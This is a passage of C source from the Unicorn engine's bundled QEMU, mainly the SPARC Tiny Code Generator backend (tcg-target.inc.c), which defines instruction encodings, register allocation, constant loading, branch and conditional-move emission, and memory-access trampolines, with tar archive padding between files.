#define TCG_AREG0 TCG_REG_I0 #define TCG_TARGET_DEFAULT_MO (0) #define TCG_TARGET_HAS_MEMORY_BSWAP 1 static inline void flush_icache_range(uintptr_t start, uintptr_t stop) { uintptr_t p; for (p = start & -8; p < ((stop + 7) & -8); p += 8) { __asm__ __volatile__("flush\t%0" : : "r" (p)); } } void tb_target_set_jmp_target(uintptr_t, uintptr_t, uintptr_t); #define TCG_TARGET_NEED_POOL_LABELS #endif ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/tcg/sparc/tcg-target.inc.c�������������������������������������������������������0000664�0000000�0000000�00000164655�14675241067�0021036�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Tiny Code Generator for QEMU * * Copyright (c) 2008 Fabrice Bellard * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. */ #include "../tcg-pool.inc.c" #ifdef CONFIG_DEBUG_TCG static const char * const tcg_target_reg_names[TCG_TARGET_NB_REGS] = { "%g0", "%g1", "%g2", "%g3", "%g4", "%g5", "%g6", "%g7", "%o0", "%o1", "%o2", "%o3", "%o4", "%o5", "%o6", "%o7", "%l0", "%l1", "%l2", "%l3", "%l4", "%l5", "%l6", "%l7", "%i0", "%i1", "%i2", "%i3", "%i4", "%i5", "%i6", "%i7", }; #endif #ifdef __arch64__ # define SPARC64 1 #else # define SPARC64 0 #endif /* Note that sparcv8plus can only hold 64 bit quantities in %g and %o registers. These are saved manually by the kernel in full 64-bit slots. The %i and %l registers are saved by the register window mechanism, which only allocates space for 32 bits. Given that this window spill/fill can happen on any signal, we must consider the high bits of the %i and %l registers garbage at all times. */ #if SPARC64 # define ALL_64 0xffffffffu #else # define ALL_64 0xffffu #endif /* Define some temporary registers. T2 is used for constant generation. */ #define TCG_REG_T1 TCG_REG_G1 #define TCG_REG_T2 TCG_REG_O7 #ifndef CONFIG_SOFTMMU # define TCG_GUEST_BASE_REG TCG_REG_I5 #endif #define TCG_REG_TB TCG_REG_I1 #define USE_REG_TB (sizeof(void *) > 4) static const int tcg_target_reg_alloc_order[] = { TCG_REG_L0, TCG_REG_L1, TCG_REG_L2, TCG_REG_L3, TCG_REG_L4, TCG_REG_L5, TCG_REG_L6, TCG_REG_L7, TCG_REG_I0, TCG_REG_I1, TCG_REG_I2, TCG_REG_I3, TCG_REG_I4, TCG_REG_I5, TCG_REG_G2, TCG_REG_G3, TCG_REG_G4, TCG_REG_G5, TCG_REG_O0, TCG_REG_O1, TCG_REG_O2, TCG_REG_O3, TCG_REG_O4, TCG_REG_O5, }; static const int tcg_target_call_iarg_regs[6] = { TCG_REG_O0, TCG_REG_O1, TCG_REG_O2, TCG_REG_O3, TCG_REG_O4, TCG_REG_O5, }; static const int tcg_target_call_oarg_regs[] = { TCG_REG_O0, TCG_REG_O1, TCG_REG_O2, TCG_REG_O3, }; #define INSN_OP(x) ((x) << 30) #define INSN_OP2(x) ((x) << 22) #define INSN_OP3(x) ((x) << 19) #define INSN_OPF(x) ((x) << 5) #define INSN_RD(x) ((x) << 25) #define INSN_RS1(x) ((x) << 14) #define INSN_RS2(x) (x) #define INSN_ASI(x) ((x) << 5) #define INSN_IMM10(x) ((1 << 13) | ((x) & 0x3ff)) #define INSN_IMM11(x) ((1 << 13) | ((x) & 0x7ff)) #define INSN_IMM13(x) ((1 << 13) | ((x) & 0x1fff)) #define INSN_OFF16(x) ((((x) >> 2) & 0x3fff) | ((((x) >> 16) & 3) << 20)) #define INSN_OFF19(x) (((x) >> 2) & 0x07ffff) #define INSN_COND(x) ((x) << 25) #define COND_N 0x0 #define COND_E 0x1 #define COND_LE 0x2 #define COND_L 0x3 #define COND_LEU 0x4 #define COND_CS 0x5 #define COND_NEG 0x6 #define COND_VS 0x7 #define COND_A 0x8 #define COND_NE 0x9 #define COND_G 0xa #define COND_GE 0xb #define COND_GU 0xc #define COND_CC 0xd #define COND_POS 0xe #define COND_VC 0xf #define BA (INSN_OP(0) | INSN_COND(COND_A) | INSN_OP2(0x2)) #define RCOND_Z 1 #define RCOND_LEZ 2 #define RCOND_LZ 3 #define RCOND_NZ 5 #define RCOND_GZ 6 #define RCOND_GEZ 7 #define MOVCC_ICC (1 << 18) #define MOVCC_XCC (1 << 18 | 1 << 12) #define BPCC_ICC 0 #define BPCC_XCC (2 << 20) #define BPCC_PT (1 << 19) #define BPCC_PN 0 #define BPCC_A (1 << 29) #define BPR_PT BPCC_PT #define ARITH_ADD (INSN_OP(2) | INSN_OP3(0x00)) #define ARITH_ADDCC (INSN_OP(2) | INSN_OP3(0x10)) #define ARITH_AND (INSN_OP(2) | INSN_OP3(0x01)) #define ARITH_ANDN (INSN_OP(2) | INSN_OP3(0x05)) #define ARITH_OR (INSN_OP(2) | INSN_OP3(0x02)) #define ARITH_ORCC (INSN_OP(2) | INSN_OP3(0x12)) #define ARITH_ORN (INSN_OP(2) | INSN_OP3(0x06)) #define ARITH_XOR (INSN_OP(2) | INSN_OP3(0x03)) #define ARITH_SUB (INSN_OP(2) | INSN_OP3(0x04)) #define ARITH_SUBCC (INSN_OP(2) | INSN_OP3(0x14)) #define ARITH_ADDC (INSN_OP(2) | INSN_OP3(0x08)) #define ARITH_SUBC (INSN_OP(2) | INSN_OP3(0x0c)) #define ARITH_UMUL (INSN_OP(2) | INSN_OP3(0x0a)) #define ARITH_SMUL (INSN_OP(2) | INSN_OP3(0x0b)) #define ARITH_UDIV (INSN_OP(2) | INSN_OP3(0x0e)) #define ARITH_SDIV (INSN_OP(2) | INSN_OP3(0x0f)) #define ARITH_MULX (INSN_OP(2) | INSN_OP3(0x09)) #define ARITH_UDIVX (INSN_OP(2) | INSN_OP3(0x0d)) #define ARITH_SDIVX (INSN_OP(2) | INSN_OP3(0x2d)) #define ARITH_MOVCC (INSN_OP(2) | INSN_OP3(0x2c)) #define ARITH_MOVR (INSN_OP(2) | INSN_OP3(0x2f)) #define ARITH_ADDXC (INSN_OP(2) | INSN_OP3(0x36) | INSN_OPF(0x11)) #define ARITH_UMULXHI (INSN_OP(2) | INSN_OP3(0x36) | INSN_OPF(0x16)) #define SHIFT_SLL (INSN_OP(2) | INSN_OP3(0x25)) #define SHIFT_SRL (INSN_OP(2) | INSN_OP3(0x26)) #define SHIFT_SRA (INSN_OP(2) | INSN_OP3(0x27)) #define SHIFT_SLLX (INSN_OP(2) | INSN_OP3(0x25) | (1 << 12)) #define SHIFT_SRLX (INSN_OP(2) | INSN_OP3(0x26) | (1 << 12)) #define SHIFT_SRAX (INSN_OP(2) | INSN_OP3(0x27) | (1 << 12)) #define RDY (INSN_OP(2) | INSN_OP3(0x28) | INSN_RS1(0)) #define WRY (INSN_OP(2) | INSN_OP3(0x30) | INSN_RD(0)) #define JMPL (INSN_OP(2) | INSN_OP3(0x38)) #define RETURN (INSN_OP(2) | INSN_OP3(0x39)) #define SAVE (INSN_OP(2) | INSN_OP3(0x3c)) #define RESTORE (INSN_OP(2) | INSN_OP3(0x3d)) #define SETHI (INSN_OP(0) | INSN_OP2(0x4)) #define CALL INSN_OP(1) #define LDUB (INSN_OP(3) | INSN_OP3(0x01)) #define LDSB (INSN_OP(3) | INSN_OP3(0x09)) #define LDUH (INSN_OP(3) | INSN_OP3(0x02)) #define LDSH (INSN_OP(3) | INSN_OP3(0x0a)) #define LDUW (INSN_OP(3) | INSN_OP3(0x00)) #define LDSW (INSN_OP(3) | INSN_OP3(0x08)) #define LDX (INSN_OP(3) | INSN_OP3(0x0b)) #define STB (INSN_OP(3) | INSN_OP3(0x05)) #define STH (INSN_OP(3) | INSN_OP3(0x06)) #define STW (INSN_OP(3) | INSN_OP3(0x04)) #define STX (INSN_OP(3) | INSN_OP3(0x0e)) #define LDUBA (INSN_OP(3) | INSN_OP3(0x11)) #define LDSBA (INSN_OP(3) | INSN_OP3(0x19)) #define LDUHA (INSN_OP(3) | INSN_OP3(0x12)) #define LDSHA (INSN_OP(3) | INSN_OP3(0x1a)) #define LDUWA (INSN_OP(3) | INSN_OP3(0x10)) #define LDSWA (INSN_OP(3) | INSN_OP3(0x18)) #define LDXA (INSN_OP(3) | INSN_OP3(0x1b)) #define STBA (INSN_OP(3) | INSN_OP3(0x15)) #define STHA (INSN_OP(3) | INSN_OP3(0x16)) #define STWA (INSN_OP(3) | INSN_OP3(0x14)) #define STXA (INSN_OP(3) | INSN_OP3(0x1e)) #define MEMBAR (INSN_OP(2) | INSN_OP3(0x28) | INSN_RS1(15) | (1 << 13)) #define NOP (SETHI | INSN_RD(TCG_REG_G0) | 0) #ifndef ASI_PRIMARY_LITTLE #define ASI_PRIMARY_LITTLE 0x88 #endif #define LDUH_LE (LDUHA | INSN_ASI(ASI_PRIMARY_LITTLE)) #define LDSH_LE (LDSHA | INSN_ASI(ASI_PRIMARY_LITTLE)) #define LDUW_LE (LDUWA | INSN_ASI(ASI_PRIMARY_LITTLE)) #define LDSW_LE (LDSWA | INSN_ASI(ASI_PRIMARY_LITTLE)) #define LDX_LE (LDXA | INSN_ASI(ASI_PRIMARY_LITTLE)) #define STH_LE (STHA | INSN_ASI(ASI_PRIMARY_LITTLE)) #define STW_LE (STWA | INSN_ASI(ASI_PRIMARY_LITTLE)) #define STX_LE (STXA | INSN_ASI(ASI_PRIMARY_LITTLE)) #ifndef use_vis3_instructions bool use_vis3_instructions; #endif static inline int check_fit_i64(int64_t val, unsigned int bits) { return val == sextract64(val, 0, bits); } static inline int check_fit_i32(int32_t val, unsigned int bits) { return val == sextract32(val, 0, bits); } #define check_fit_tl check_fit_i64 #if SPARC64 # define check_fit_ptr check_fit_i64 #else # define check_fit_ptr check_fit_i32 #endif static bool patch_reloc(tcg_insn_unit *code_ptr, int type, intptr_t value, intptr_t addend) { uint32_t insn = *code_ptr; intptr_t pcrel; value += addend; pcrel = tcg_ptr_byte_diff((tcg_insn_unit *)value, code_ptr); switch (type) { case R_SPARC_WDISP16: assert(check_fit_ptr(pcrel >> 2, 16)); insn &= ~INSN_OFF16(-1); insn |= INSN_OFF16(pcrel); break; case R_SPARC_WDISP19: assert(check_fit_ptr(pcrel >> 2, 19)); insn &= ~INSN_OFF19(-1); insn |= INSN_OFF19(pcrel); break; default: g_assert_not_reached(); } *code_ptr = insn; return true; } /* parse target specific constraints */ static const char *target_parse_constraint(TCGArgConstraint *ct, const char *ct_str, TCGType type) { switch (*ct_str++) { case 'r': ct->ct |= TCG_CT_REG; ct->u.regs = 0xffffffff; break; case 'R': ct->ct |= TCG_CT_REG; ct->u.regs = ALL_64; break; case 'A': /* qemu_ld/st address constraint */ ct->ct |= TCG_CT_REG; ct->u.regs = TARGET_LONG_BITS == 64 ? ALL_64 : 0xffffffff; reserve_helpers: tcg_regset_reset_reg(ct->u.regs, TCG_REG_O0); tcg_regset_reset_reg(ct->u.regs, TCG_REG_O1); tcg_regset_reset_reg(ct->u.regs, TCG_REG_O2); break; case 's': /* qemu_st data 32-bit constraint */ ct->ct |= TCG_CT_REG; ct->u.regs = 0xffffffff; goto reserve_helpers; case 'S': /* qemu_st data 64-bit constraint */ ct->ct |= TCG_CT_REG; ct->u.regs = ALL_64; goto reserve_helpers; case 'I': ct->ct |= TCG_CT_CONST_S11; break; case 'J': ct->ct |= TCG_CT_CONST_S13; break; case 'Z': ct->ct |= TCG_CT_CONST_ZERO; break; default: return NULL; } return ct_str; } /* test if a constant matches the constraint */ static inline int tcg_target_const_match(tcg_target_long val, TCGType type, const TCGArgConstraint *arg_ct) { int ct = arg_ct->ct; if (ct & TCG_CT_CONST) { return 1; } if (type == TCG_TYPE_I32) { val = (int32_t)val; } if ((ct & TCG_CT_CONST_ZERO) && val == 0) { return 1; } else if ((ct & TCG_CT_CONST_S11) && check_fit_tl(val, 11)) { return 1; } else if ((ct & TCG_CT_CONST_S13) && check_fit_tl(val, 13)) { return 1; } else { return 0; } } static inline void tcg_out_arith(TCGContext *s, TCGReg rd, TCGReg rs1, TCGReg rs2, int op) { tcg_out32(s, op | INSN_RD(rd) | INSN_RS1(rs1) | INSN_RS2(rs2)); } static inline void tcg_out_arithi(TCGContext *s, TCGReg rd, TCGReg rs1, int32_t offset, int op) { tcg_out32(s, op | INSN_RD(rd) | INSN_RS1(rs1) | INSN_IMM13(offset)); } static void tcg_out_arithc(TCGContext *s, TCGReg rd, TCGReg rs1, int32_t val2, int val2const, int op) { tcg_out32(s, op | INSN_RD(rd) | INSN_RS1(rs1) | (val2const ? INSN_IMM13(val2) : INSN_RS2(val2))); } static inline bool tcg_out_mov(TCGContext *s, TCGType type, TCGReg ret, TCGReg arg) { if (ret != arg) { tcg_out_arith(s, ret, arg, TCG_REG_G0, ARITH_OR); } return true; } static inline void tcg_out_sethi(TCGContext *s, TCGReg ret, uint32_t arg) { tcg_out32(s, SETHI | INSN_RD(ret) | ((arg & 0xfffffc00) >> 10)); } static inline void tcg_out_movi_imm13(TCGContext *s, TCGReg ret, int32_t arg) { tcg_out_arithi(s, ret, TCG_REG_G0, arg, ARITH_OR); } static void tcg_out_movi_int(TCGContext *s, TCGType type, TCGReg ret, tcg_target_long arg, bool in_prologue) { tcg_target_long hi, lo = (int32_t)arg; tcg_target_long test, lsb; /* Make sure we test 32-bit constants for imm13 properly. */ if (type == TCG_TYPE_I32) { arg = lo; } /* A 13-bit constant sign-extended to 64-bits. */ if (check_fit_tl(arg, 13)) { tcg_out_movi_imm13(s, ret, arg); return; } /* A 13-bit constant relative to the TB. */ if (!in_prologue && USE_REG_TB) { test = arg - (uintptr_t)s->code_gen_ptr; if (check_fit_ptr(test, 13)) { tcg_out_arithi(s, ret, TCG_REG_TB, test, ARITH_ADD); return; } } /* A 32-bit constant, or 32-bit zero-extended to 64-bits. */ if (type == TCG_TYPE_I32 || arg == (uint32_t)arg) { tcg_out_sethi(s, ret, arg); if (arg & 0x3ff) { tcg_out_arithi(s, ret, ret, arg & 0x3ff, ARITH_OR); } return; } /* A 32-bit constant sign-extended to 64-bits. */ if (arg == lo) { tcg_out_sethi(s, ret, ~arg); tcg_out_arithi(s, ret, ret, (arg & 0x3ff) | -0x400, ARITH_XOR); return; } /* A 21-bit constant, shifted. */ lsb = ctz64(arg); test = (tcg_target_long)arg >> lsb; if (check_fit_tl(test, 13)) { tcg_out_movi_imm13(s, ret, test); tcg_out_arithi(s, ret, ret, lsb, SHIFT_SLLX); return; } else if (lsb > 10 && test == extract64(test, 0, 21)) { tcg_out_sethi(s, ret, test << 10); tcg_out_arithi(s, ret, ret, lsb - 10, SHIFT_SLLX); return; } /* A 64-bit constant decomposed into 2 32-bit pieces. */ if (check_fit_i32(lo, 13)) { hi = (arg - lo) >> 32; tcg_out_movi(s, TCG_TYPE_I32, ret, hi); tcg_out_arithi(s, ret, ret, 32, SHIFT_SLLX); tcg_out_arithi(s, ret, ret, lo, ARITH_ADD); } else { hi = arg >> 32; tcg_out_movi(s, TCG_TYPE_I32, ret, hi); tcg_out_movi(s, TCG_TYPE_I32, TCG_REG_T2, lo); tcg_out_arithi(s, ret, ret, 32, SHIFT_SLLX); tcg_out_arith(s, ret, ret, TCG_REG_T2, ARITH_OR); } } static inline void tcg_out_movi(TCGContext *s, TCGType type, TCGReg ret, tcg_target_long arg) { tcg_out_movi_int(s, type, ret, arg, false); } static inline void tcg_out_ldst_rr(TCGContext *s, TCGReg data, TCGReg a1, TCGReg a2, int op) { tcg_out32(s, op | INSN_RD(data) | INSN_RS1(a1) | INSN_RS2(a2)); } static void tcg_out_ldst(TCGContext *s, TCGReg ret, TCGReg addr, intptr_t offset, int op) { if (check_fit_ptr(offset, 13)) { tcg_out32(s, op | INSN_RD(ret) | INSN_RS1(addr) | INSN_IMM13(offset)); } else { tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_T1, offset); tcg_out_ldst_rr(s, ret, addr, TCG_REG_T1, op); } } static inline void tcg_out_ld(TCGContext *s, TCGType type, TCGReg ret, TCGReg arg1, intptr_t arg2) { tcg_out_ldst(s, ret, arg1, arg2, (type == TCG_TYPE_I32 ? LDUW : LDX)); } static inline void tcg_out_st(TCGContext *s, TCGType type, TCGReg arg, TCGReg arg1, intptr_t arg2) { tcg_out_ldst(s, arg, arg1, arg2, (type == TCG_TYPE_I32 ? STW : STX)); } static inline bool tcg_out_sti(TCGContext *s, TCGType type, TCGArg val, TCGReg base, intptr_t ofs) { if (val == 0) { tcg_out_st(s, type, TCG_REG_G0, base, ofs); return true; } return false; } static void tcg_out_ld_ptr(TCGContext *s, TCGReg ret, uintptr_t arg) { intptr_t diff = arg - (uintptr_t)s->code_gen_ptr; if (USE_REG_TB && check_fit_ptr(diff, 13)) { tcg_out_ld(s, TCG_TYPE_PTR, ret, TCG_REG_TB, diff); return; } tcg_out_movi(s, TCG_TYPE_PTR, ret, arg & ~0x3ff); tcg_out_ld(s, TCG_TYPE_PTR, ret, ret, arg & 0x3ff); } static inline void tcg_out_sety(TCGContext *s, TCGReg rs) { tcg_out32(s, WRY | INSN_RS1(TCG_REG_G0) | INSN_RS2(rs)); } static inline void tcg_out_rdy(TCGContext *s, TCGReg rd) { tcg_out32(s, RDY | INSN_RD(rd)); } static void tcg_out_div32(TCGContext *s, TCGReg rd, TCGReg rs1, int32_t val2, int val2const, int uns) { /* Load Y with the sign/zero extension of RS1 to 64-bits. */ if (uns) { tcg_out_sety(s, TCG_REG_G0); } else { tcg_out_arithi(s, TCG_REG_T1, rs1, 31, SHIFT_SRA); tcg_out_sety(s, TCG_REG_T1); } tcg_out_arithc(s, rd, rs1, val2, val2const, uns ? ARITH_UDIV : ARITH_SDIV); } static inline void tcg_out_nop(TCGContext *s) { tcg_out32(s, NOP); } static const uint8_t tcg_cond_to_bcond[] = { [TCG_COND_EQ] = COND_E, [TCG_COND_NE] = COND_NE, [TCG_COND_LT] = COND_L, [TCG_COND_GE] = COND_GE, [TCG_COND_LE] = COND_LE, [TCG_COND_GT] = COND_G, [TCG_COND_LTU] = COND_CS, [TCG_COND_GEU] = COND_CC, [TCG_COND_LEU] = COND_LEU, [TCG_COND_GTU] = COND_GU, }; static const uint8_t tcg_cond_to_rcond[] = { [TCG_COND_EQ] = RCOND_Z, [TCG_COND_NE] = RCOND_NZ, [TCG_COND_LT] = RCOND_LZ, [TCG_COND_GT] = RCOND_GZ, [TCG_COND_LE] = RCOND_LEZ, [TCG_COND_GE] = RCOND_GEZ }; static void tcg_out_bpcc0(TCGContext *s, int scond, int flags, int off19) { tcg_out32(s, INSN_OP(0) | INSN_OP2(1) | INSN_COND(scond) | flags | off19); } static void tcg_out_bpcc(TCGContext *s, int scond, int flags, TCGLabel *l) { int off19 = 0; if (l->has_value) { off19 = INSN_OFF19(tcg_pcrel_diff(s, l->u.value_ptr)); } else { tcg_out_reloc(s, s->code_ptr, R_SPARC_WDISP19, l, 0); } tcg_out_bpcc0(s, scond, flags, off19); } static void tcg_out_cmp(TCGContext *s, TCGReg c1, int32_t c2, int c2const) { tcg_out_arithc(s, TCG_REG_G0, c1, c2, c2const, ARITH_SUBCC); } static void tcg_out_brcond_i32(TCGContext *s, TCGCond cond, TCGReg arg1, int32_t arg2, int const_arg2, TCGLabel *l) { tcg_out_cmp(s, arg1, arg2, const_arg2); tcg_out_bpcc(s, tcg_cond_to_bcond[cond], BPCC_ICC | BPCC_PT, l); tcg_out_nop(s); } static void tcg_out_movcc(TCGContext *s, TCGCond cond, int cc, TCGReg ret, int32_t v1, int v1const) { tcg_out32(s, ARITH_MOVCC | cc | INSN_RD(ret) | INSN_RS1(tcg_cond_to_bcond[cond]) | (v1const ? INSN_IMM11(v1) : INSN_RS2(v1))); } static void tcg_out_movcond_i32(TCGContext *s, TCGCond cond, TCGReg ret, TCGReg c1, int32_t c2, int c2const, int32_t v1, int v1const) { tcg_out_cmp(s, c1, c2, c2const); tcg_out_movcc(s, cond, MOVCC_ICC, ret, v1, v1const); } static void tcg_out_brcond_i64(TCGContext *s, TCGCond cond, TCGReg arg1, int32_t arg2, int const_arg2, TCGLabel *l) { /* For 64-bit signed comparisons vs zero, we can avoid the compare. */ if (arg2 == 0 && !is_unsigned_cond(cond)) { int off16 = 0; if (l->has_value) { off16 = INSN_OFF16(tcg_pcrel_diff(s, l->u.value_ptr)); } else { tcg_out_reloc(s, s->code_ptr, R_SPARC_WDISP16, l, 0); } tcg_out32(s, INSN_OP(0) | INSN_OP2(3) | BPR_PT | INSN_RS1(arg1) | INSN_COND(tcg_cond_to_rcond[cond]) | off16); } else { tcg_out_cmp(s, arg1, arg2, const_arg2); tcg_out_bpcc(s, tcg_cond_to_bcond[cond], BPCC_XCC | BPCC_PT, l); } tcg_out_nop(s); } static void tcg_out_movr(TCGContext *s, TCGCond cond, TCGReg ret, TCGReg c1, int32_t v1, int v1const) { tcg_out32(s, ARITH_MOVR | INSN_RD(ret) | INSN_RS1(c1) | (tcg_cond_to_rcond[cond] << 10) | (v1const ? INSN_IMM10(v1) : INSN_RS2(v1))); } static void tcg_out_movcond_i64(TCGContext *s, TCGCond cond, TCGReg ret, TCGReg c1, int32_t c2, int c2const, int32_t v1, int v1const) { /* For 64-bit signed comparisons vs zero, we can avoid the compare. Note that the immediate range is one bit smaller, so we must check for that as well. */ if (c2 == 0 && !is_unsigned_cond(cond) && (!v1const || check_fit_i32(v1, 10))) { tcg_out_movr(s, cond, ret, c1, v1, v1const); } else { tcg_out_cmp(s, c1, c2, c2const); tcg_out_movcc(s, cond, MOVCC_XCC, ret, v1, v1const); } } static void tcg_out_setcond_i32(TCGContext *s, TCGCond cond, TCGReg ret, TCGReg c1, int32_t c2, int c2const) { /* For 32-bit comparisons, we can play games with ADDC/SUBC. */ switch (cond) { case TCG_COND_LTU: case TCG_COND_GEU: /* The result of the comparison is in the carry bit. */ break; case TCG_COND_EQ: case TCG_COND_NE: /* For equality, we can transform to inequality vs zero. */ if (c2 != 0) { tcg_out_arithc(s, TCG_REG_T1, c1, c2, c2const, ARITH_XOR); c2 = TCG_REG_T1; } else { c2 = c1; } c1 = TCG_REG_G0, c2const = 0; cond = (cond == TCG_COND_EQ ? TCG_COND_GEU : TCG_COND_LTU); break; case TCG_COND_GTU: case TCG_COND_LEU: /* If we don't need to load a constant into a register, we can swap the operands on GTU/LEU. There's no benefit to loading the constant into a temporary register. */ if (!c2const || c2 == 0) { TCGReg t = c1; c1 = c2; c2 = t; c2const = 0; cond = tcg_swap_cond(cond); break; } /* FALLTHRU */ default: tcg_out_cmp(s, c1, c2, c2const); tcg_out_movi_imm13(s, ret, 0); tcg_out_movcc(s, cond, MOVCC_ICC, ret, 1, 1); return; } tcg_out_cmp(s, c1, c2, c2const); if (cond == TCG_COND_LTU) { tcg_out_arithi(s, ret, TCG_REG_G0, 0, ARITH_ADDC); } else { tcg_out_arithi(s, ret, TCG_REG_G0, -1, ARITH_SUBC); } } static void tcg_out_setcond_i64(TCGContext *s, TCGCond cond, TCGReg ret, TCGReg c1, int32_t c2, int c2const) { if (use_vis3_instructions) { switch (cond) { case TCG_COND_NE: if (c2 != 0) { break; } c2 = c1, c2const = 0, c1 = TCG_REG_G0; /* FALLTHRU */ case TCG_COND_LTU: tcg_out_cmp(s, c1, c2, c2const); tcg_out_arith(s, ret, TCG_REG_G0, TCG_REG_G0, ARITH_ADDXC); return; default: break; } } /* For 64-bit signed comparisons vs zero, we can avoid the compare if the input does not overlap the output. */ if (c2 == 0 && !is_unsigned_cond(cond) && c1 != ret) { tcg_out_movi_imm13(s, ret, 0); tcg_out_movr(s, cond, ret, c1, 1, 1); } else { tcg_out_cmp(s, c1, c2, c2const); tcg_out_movi_imm13(s, ret, 0); tcg_out_movcc(s, cond, MOVCC_XCC, ret, 1, 1); } } static void tcg_out_addsub2_i32(TCGContext *s, TCGReg rl, TCGReg rh, TCGReg al, TCGReg ah, int32_t bl, int blconst, int32_t bh, int bhconst, int opl, int oph) { TCGReg tmp = TCG_REG_T1; /* Note that the low parts are fully consumed before tmp is set. */ if (rl != ah && (bhconst || rl != bh)) { tmp = rl; } tcg_out_arithc(s, tmp, al, bl, blconst, opl); tcg_out_arithc(s, rh, ah, bh, bhconst, oph); tcg_out_mov(s, TCG_TYPE_I32, rl, tmp); } static void tcg_out_addsub2_i64(TCGContext *s, TCGReg rl, TCGReg rh, TCGReg al, TCGReg ah, int32_t bl, int blconst, int32_t bh, int bhconst, bool is_sub) { TCGReg tmp = TCG_REG_T1; /* Note that the low parts are fully consumed before tmp is set. */ if (rl != ah && (bhconst || rl != bh)) { tmp = rl; } tcg_out_arithc(s, tmp, al, bl, blconst, is_sub ? ARITH_SUBCC : ARITH_ADDCC); if (use_vis3_instructions && !is_sub) { /* Note that ADDXC doesn't accept immediates. */ if (bhconst && bh != 0) { tcg_out_movi(s, TCG_TYPE_I64, TCG_REG_T2, bh); bh = TCG_REG_T2; } tcg_out_arith(s, rh, ah, bh, ARITH_ADDXC); } else if (bh == TCG_REG_G0) { /* If we have a zero, we can perform the operation in two insns, with the arithmetic first, and a conditional move into place. */ if (rh == ah) { tcg_out_arithi(s, TCG_REG_T2, ah, 1, is_sub ? ARITH_SUB : ARITH_ADD); tcg_out_movcc(s, TCG_COND_LTU, MOVCC_XCC, rh, TCG_REG_T2, 0); } else { tcg_out_arithi(s, rh, ah, 1, is_sub ? ARITH_SUB : ARITH_ADD); tcg_out_movcc(s, TCG_COND_GEU, MOVCC_XCC, rh, ah, 0); } } else { /* Otherwise adjust BH as if there is carry into T2 ... */ if (bhconst) { tcg_out_movi(s, TCG_TYPE_I64, TCG_REG_T2, bh + (is_sub ? -1 : 1)); } else { tcg_out_arithi(s, TCG_REG_T2, bh, 1, is_sub ? ARITH_SUB : ARITH_ADD); } /* ... smoosh T2 back to original BH if carry is clear ... */ tcg_out_movcc(s, TCG_COND_GEU, MOVCC_XCC, TCG_REG_T2, bh, bhconst); /* ... and finally perform the arithmetic with the new operand. */ tcg_out_arith(s, rh, ah, TCG_REG_T2, is_sub ? ARITH_SUB : ARITH_ADD); } tcg_out_mov(s, TCG_TYPE_I64, rl, tmp); } static void tcg_out_call_nodelay(TCGContext *s, tcg_insn_unit *dest, bool in_prologue) { ptrdiff_t disp = tcg_pcrel_diff(s, dest); if (disp == (int32_t)disp) { tcg_out32(s, CALL | (uint32_t)disp >> 2); } else { uintptr_t desti = (uintptr_t)dest; tcg_out_movi_int(s, TCG_TYPE_PTR, TCG_REG_T1, desti & ~0xfff, in_prologue); tcg_out_arithi(s, TCG_REG_O7, TCG_REG_T1, desti & 0xfff, JMPL); } } static void tcg_out_call(TCGContext *s, tcg_insn_unit *dest) { tcg_out_call_nodelay(s, dest, false); tcg_out_nop(s); } static void tcg_out_mb(TCGContext *s, TCGArg a0) { /* Note that the TCG memory order constants mirror the Sparc MEMBAR. */ tcg_out32(s, MEMBAR | (a0 & TCG_MO_ALL)); } #ifdef CONFIG_SOFTMMU static tcg_insn_unit *qemu_ld_trampoline[16]; static tcg_insn_unit *qemu_st_trampoline[16]; static void emit_extend(TCGContext *s, TCGReg r, int op) { /* Emit zero extend of 8, 16 or 32 bit data as * required by the MO_* value op; do nothing for 64 bit. */ switch (op & MO_SIZE) { case MO_8: tcg_out_arithi(s, r, r, 0xff, ARITH_AND); break; case MO_16: tcg_out_arithi(s, r, r, 16, SHIFT_SLL); tcg_out_arithi(s, r, r, 16, SHIFT_SRL); break; case MO_32: if (SPARC64) { tcg_out_arith(s, r, r, 0, SHIFT_SRL); } break; case MO_64: break; } } static void build_trampolines(TCGContext *s) { static void * const qemu_ld_helpers[16] = { [MO_UB] = helper_ret_ldub_mmu, [MO_SB] = helper_ret_ldsb_mmu, [MO_LEUW] = helper_le_lduw_mmu, [MO_LESW] = helper_le_ldsw_mmu, [MO_LEUL] = helper_le_ldul_mmu, [MO_LEQ] = helper_le_ldq_mmu, [MO_BEUW] = helper_be_lduw_mmu, [MO_BESW] = helper_be_ldsw_mmu, [MO_BEUL] = helper_be_ldul_mmu, [MO_BEQ] = helper_be_ldq_mmu, }; static void * const qemu_st_helpers[16] = { [MO_UB] = helper_ret_stb_mmu, [MO_LEUW] = helper_le_stw_mmu, [MO_LEUL] = helper_le_stl_mmu, [MO_LEQ] = helper_le_stq_mmu, [MO_BEUW] = helper_be_stw_mmu, [MO_BEUL] = helper_be_stl_mmu, [MO_BEQ] = helper_be_stq_mmu, }; int i; TCGReg ra; for (i = 0; i < 16; ++i) { if (qemu_ld_helpers[i] == NULL) { continue; } /* May as well align the trampoline. */ while ((uintptr_t)s->code_ptr & 15) { tcg_out_nop(s); } qemu_ld_trampoline[i] = s->code_ptr; if (SPARC64 || TARGET_LONG_BITS == 32) { ra = TCG_REG_O3; } else { /* Install the high part of the address. */ tcg_out_arithi(s, TCG_REG_O1, TCG_REG_O2, 32, SHIFT_SRLX); ra = TCG_REG_O4; } /* Set the 